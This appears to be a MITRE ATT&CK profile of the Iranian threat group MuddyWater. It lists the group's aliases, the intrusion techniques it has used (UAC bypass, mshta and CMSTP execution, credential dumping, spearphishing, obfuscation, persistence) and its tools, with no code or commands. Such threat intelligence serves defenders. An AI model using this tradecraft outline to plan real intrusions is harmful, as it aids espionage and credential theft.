MuddyWater

MuddyWater is an Iranian threat group that has primarily targeted Middle Eastern nations, and has also targeted European and North American nations. The group's victims are mainly in the telecommunications, government (IT services), and oil sectors. Activity from this group was previously linked to FIN7, but the group is believed to be a distinct group possibly motivated by espionage.[1][2][3]

ID: G0069
Version: 2.0

Associated Group Descriptions

NameDescription
Seedworm[2]
TEMP.Zagros[4]

Techniques Used

DomainIDNameUse
EnterpriseT1088Bypass User Account ControlMuddyWater uses various techniques to bypass UAC.[3]
EnterpriseT1191CMSTPMuddyWater has used CMSTP.exe and a malicious INF to execute its POWERSTATS payload.[4]
EnterpriseT1059Command-Line InterfaceMuddyWater has used a custom tool for creating reverse shells.[2]
EnterpriseT1500Compile After DeliveryMuddyWater has used the .NET csc.exe tool to compile executables from downloaded C# code.[3]
EnterpriseT1090Connection ProxyMuddyWater has controlled POWERSTATS from behind a proxy network to obfuscate the C2 location.[2]
EnterpriseT1003Credential DumpingMuddyWater has performed credential dumping with Mimikatz, LaZagne, and other tools, including by dumping passwords saved in victim web browsers and email.[1][2]
EnterpriseT1081Credentials in FilesMuddyWater has run a tool that steals passwords saved in victim web browsers and email.[2]
EnterpriseT1002Data CompressedMuddyWater has used the native Windows cabinet creation tool, makecab.exe, likely to compress stolen data to be uploaded.[2]
EnterpriseT1140Deobfuscate/Decode Files or InformationMuddyWater decoded base64-encoded PowerShell commands using a VBS file.[4][5][3]
EnterpriseT1175Distributed Component Object ModelMuddyWater has used malware that has the capability to execute malware via COM and Outlook.[6]
EnterpriseT1173Dynamic Data ExchangeMuddyWater has used malware that can execute PowerShell scripts via DDE.[6]
EnterpriseT1083File and Directory DiscoveryMuddyWater has used malware that checked if the ProgramData folder had folders or files with the keywords "Kasper," "Panda," or "ESET."[6]
EnterpriseT1036MasqueradingMuddyWater has used filenames and Registry key names associated with Windows Defender. The group has also stored obfuscated JavaScript code in an image file named temp.jpg.[4][3]
EnterpriseT1170MshtaMuddyWater has used mshta.exe to execute its POWERSTATS payload and to pass a PowerShell one-liner for execution.[4][6]
EnterpriseT1027Obfuscated Files or InformationMuddyWater has used Daniel Bohannon’s Invoke-Obfuscation framework. The group has also used other obfuscation methods, including Base64 obfuscation of VBScripts and PowerShell commands.[1][7][1][4][6]
EnterpriseT1086PowerShellMuddyWater has used PowerShell for execution.[4][5][6][2][3]
EnterpriseT1057Process DiscoveryMuddyWater has used malware to obtain a list of running processes on the system.[6]
EnterpriseT1060Registry Run Keys / Startup FolderMuddyWater has added Registry Run keys to establish persistence.[4][6]
EnterpriseT1105Remote File CopyMuddyWater has used malware that can upload additional files to the victim’s machine.[6][3]
EnterpriseT1085Rundll32MuddyWater has used malware that leveraged rundll32.exe in a Registry Run key to execute a .dll.[6]
EnterpriseT1113Screen CaptureMuddyWater has used malware that can capture screenshots of the victim’s machine.[6]
EnterpriseT1064ScriptingMuddyWater has used VBScript and JavaScript files to execute its POWERSTATS payload. MuddyWater has also used Microsoft scriptlets, macros, and PowerShell scripts.[[4][5][6][2][3]
EnterpriseT1063Security Software DiscoveryMuddyWater has used malware to check running processes against a hard-coded list of security tools often used by malware researchers.[6]
EnterpriseT1193Spearphishing AttachmentMuddyWater has compromised third parties and used compromised accounts to send spearphishing emails with targeted attachments to recipients.[1][4][6]
EnterpriseT1082System Information DiscoveryMuddyWater has used malware that can collect the victim’s OS version and machine name.[6]
EnterpriseT1016System Network Configuration DiscoveryMuddyWater has used malware to collect the victim’s IP address and domain name.[6]
EnterpriseT1033System Owner/User DiscoveryMuddyWater has used malware that can collect the victim’s username.[6]
EnterpriseT1204User ExecutionMuddyWater has attempted to get users to enable macros and launch malicious Microsoft Word documents delivered via spearphishing emails.[1][4][6]
EnterpriseT1047Windows Management InstrumentationMuddyWater has used malware that leveraged WMI for execution.[6][3]

Software

IDNameReferencesTechniques
S0349LaZagne[2]Credential Dumping, Credentials in Files
S0002Mimikatz[1]Account Manipulation, Credential Dumping, Credentials in Files, DCShadow, Pass the Hash, Pass the Ticket, Private Keys, Security Support Provider, SID-History Injection
S0223POWERSTATS[1][4][3][2]Account Discovery, Commonly Used Port, Connection Proxy, Data Encoding, Data from Local System, Deobfuscate/Decode Files or Information, Disabling Security Tools, Distributed Component Object Model, Dynamic Data Exchange, File Deletion, Masquerading, Mshta, Obfuscated Files or Information, PowerShell, Remote File Copy, Scheduled Task, Scheduled Transfer, Screen Capture, Scripting, Security Software Discovery, Standard Cryptographic Protocol, System Information Discovery, System Network Configuration Discovery, Uncommonly Used Port, Windows Management Instrumentation

References